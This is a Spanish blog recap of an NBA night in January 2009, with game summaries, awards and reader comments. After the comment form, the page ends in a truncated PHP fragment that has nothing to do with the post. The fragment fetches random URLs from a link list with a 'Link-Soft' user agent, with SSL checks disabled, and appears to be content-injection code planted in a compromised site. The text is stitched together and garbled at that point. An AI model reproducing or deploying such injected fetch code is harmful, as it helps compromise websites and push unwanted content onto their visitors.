La crónica (2/01/2008)

03 de January de 2009 por txusma

15 partidos, el máximo posible. Si alguien no había podido disfrutar de la NBA estas vacaciones ayer se pudo dar todo un atracón y además de lo más variado: Buzzer-Beaters (hasta 3), destacadas actuaciones de los españoles, actuaciones individuales de escándalo, partidos con altas puntuaciones… Pasen y vean que tenemos trabajo:

En el partido a priori más interesante de la jornada New Orleans le aplicó un severo correctivo a Portland que jugó sin Brandon Roy por segundo partido consecutivo debido a unas molestias en los isquiotibiales. Es muy posible que estas molestias le obliguen también a perderse el partido del domingo contra los Lakers. El partido mantuvo su igualdad hasta que Chandler fue expulsado del tras una pela con Pryzbilla. En ese momento, y con los Hornets 5 puntos abajo el partido parecía decantarse para los de Oregon. Pero nada más lejos de la realidad. Un parcial de 41-19 en los últimos minutos con unos West y Paul estelares amarraron la victoria para los Hornets. Rudy jugó un gran partido y fue el mejor de su equipo con 19 puntos mientras que Sergio estuvo bastante discreto en los 10 minutos que disfrutó.

El resto de cocos de la liga ganaron con facilidad a excepción de los Nuggets. Estos tuvieron que pelear hasta el último segundo para doblegar a unos Thunder que se pusieron por delante con un triple de Kevin Durant a falta de 2.7 segundos para el final, pero que finalmente vieron como Carmelo Anthony anotaba a falta de 0.1 segundos el tiro de 3 que daba la victoria a Denver.

Los Lakers no dieron ninguna opción a los Jazz y ya desde el primer cuarto pusieron tierra de por medio. Liderados por unos fantásticos Kobe Bryant (autor de 40 puntos) y Pau Gasol (21 puntos, 11 rebotes y 6 asistencias y 10.000 puntos ya en toda su carrera), se hicieron con el partido gracias, finalmente, a 2 jugadas providenciales de Ariza en los últimos minutos de partido, cuando los Jazz habían conseguido situarse a tan solo 4 puntos de distancia.

Celtics y Cavaliers se divertieron de lo lindo con Wizards y Bulls respectivamente en unos partidos sin nada que destacar aparte de que Rajon Rondo lleva mejor encaminada su presencia en el All-Stars que Calderón, que Pierce estuvo casi perfecto, que Lebron acabó con un triple doble y que Varejao cubrió perfectamente la baja de Ilgauskas, que no volverá hasta finales de enero. Con esta victoria los Cavs llevan 17 victorias y 0 derrotas en casa, que se dice pronto.

Otros que consiguieron victorias fueron los Magic frente a los Heat, la décima novena seguida en casa a pesar del 1 de 14 de Turkoglu y los Pistons contra los Kings, que suerte que cambiaron de entrenador porque sino… Entre Iverson y Stuckey se jugaron ¡53 tiros! lo que les permitió acabar con 23 y 38 puntos respectivamente. A destacar el partido de Amir Johnson que sustituía a Rashed Wallace y sentimos no poder decir lo mismo de Kwame que también jugó en lugar de Antonio McDyess.

Por su parte San Antonio se deshizo de unos Grizzlies donde sólo Hakim Warrick y Marc Gasol saltaron a jugar, los Mavericks hicieron lo propio con unos Sixers que no levantan cabeza y los Suns se impusieron a unos mermadísimos Clippers. Ojito con Camby que en los últimos 3 partidos lleva 21.3 rebotes de media. Brutal.

Los Nets dieron la mini-sorpresa de la jornada imponiéndose a los Hawks en la prórroga gracias a un triplazo de Carter en el último suspiro. Si yo tengo que elegir entre Carter y Harris para jugarme el último tiro de momento me quedo con Carter. A ver si encontramos en algún sitio en número de beazzer-beater de cada jugador porque del escolta de New Jersey recuerdo unos cuantos.

Con otro de los beazzer-beaters del día Jarret Jack dio la victoria frente a los Knicks a unos Pacers necesitadísimos de victorias y los Raptors, por su parte, se impusieron fácilmente a unos Rockets desdibujados a pesar de la lesión de Calderón, que se tuvo que retirar en el segundo cuarto. Bargnani nos sigue sorprendiendo jugando de pívot y ayer anotó 19 puntos.

Y ya para acabar, los Wolves ganaron a los Warriors demostrando una mejoría en cuanto a resultados en los últimos partidos y los Bucks apalizaron a los Bobcats con un buen partido de Michael Redd.

Os dejamos con las 10 mejores jugadas que hoy especialmente son de gran calidad. No os perdáis la asistencia de Rondo, el triplazo de Carter para ganar el partido y la jugadita de Gasol, digna del mejor base.

PREMIOS

MVP: En una jornada con 15 partidos hay muchos candidatos, desde los mas ‘normales’ como Duncan con 20-10-5, 3 tapones y un 72% en tiros, pasando por Nene con 24-14-4 y un solo tiro fallado, el triple-doble de Lebron, el 26-11 de Harris en un partido con prórroga, un nuevo partidazo de Al Jefferson o la resurección de Redd. Pero el premio esta noche es cosa de dos: Stuckey liderando a Detroit con 38-4-7 y Kobe Bryant con sus 40-7-4. Sus mejores porcentajes y menos perdidas hacen que nos decantemos finalmente por el angelino.

Rookie: En una mala noche del top-3 del pasado draft encontramos, sin embargo, buenas actuaciones  de muchos novatos. Por ejemplo Hibbert (que por alguna extraña razón juega poquísimo), Brook Lopez, Hickson, Morrow, Westbrook o Thompson. Mención aparte y especial merecen Eric Gordon y Rudy Fernandez liderando a sus equipos en ausencia de los jugadores franquicia. Con todos estos candidatos el premio es para alguien a quien llevamos esperando toda la temporada:  Kevin Love con 19 puntos, 8 rebotes y buenos porcentajes en 25 minutos de juego.

La Sorpresa: Podría ser perfectamente la victoria de Toronto por 21 ante Houston o los 29 puntos de Jack o los 27 de Villanueva, pero todas estas actuaciones quedan a años luz del ya mencionado partidazo de Rodney Stuckey.

La decepción: Houston y Sixers, personificadas en McGrady y Dalembert con  actuaciones realmente lamentables.

Mayor esfuerzo en vano: Habitual en la sección es Kevin Durant, anoche con 33 puntos, 9 rebotes y 5 asistencias. Empieza a serlo Camby que esta haciendo números mastodónticos como el 19-23-4 de ayer. Tampoco se quedan cortos Brad Miller, Mehmet Okur o David Lee, pero el premio de hoy recae en Dwyane Wade, que mantuvo a su equipo con el partido igualado hasta el último cuarto con más de la mitad de los puntos de Miami.

Comenta

4 comentarios a esta entrada

  1. kantonyo dice:
    #1

    A pesar del talento de OJ Mayo y Derrick Rose, ultimamente estan bajando de rendimiento y vienen varios rookies pegando fuerte como Chalmers, Marc, Lopez, Gordon y Westbrook.

    Al final podrian quedarse los dos sin el rookie del año.

      Citar

  2. TheDeerHunter dice:
    #2

    Increíble Pau… casi me he emocionado y todo

      Citar

  3. Hynreck dice:
    #3

    Carter sí, pero otro jugador clutch por excelencia es Melo, tb le recuerdo unos cuantos.

      Citar

  4. MagicJohnson32 dice:
    #4

    Buen partido de los Lakers anoche, con un Kobe que sigue inspiradísimo (71 puntos en los últimos 70 minutos de juego), Pau con un partido muy completo y rematado con esa jugada y Ariza siendo determinante al final. Bien también Odom, cubriendo la mala noche de Bynum y Luke. En conjunto lo mejor fue que el equipo supo responder cada vez que los Jazz achucharon y la sensación final fue que el partido se ganaba sí o sí.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>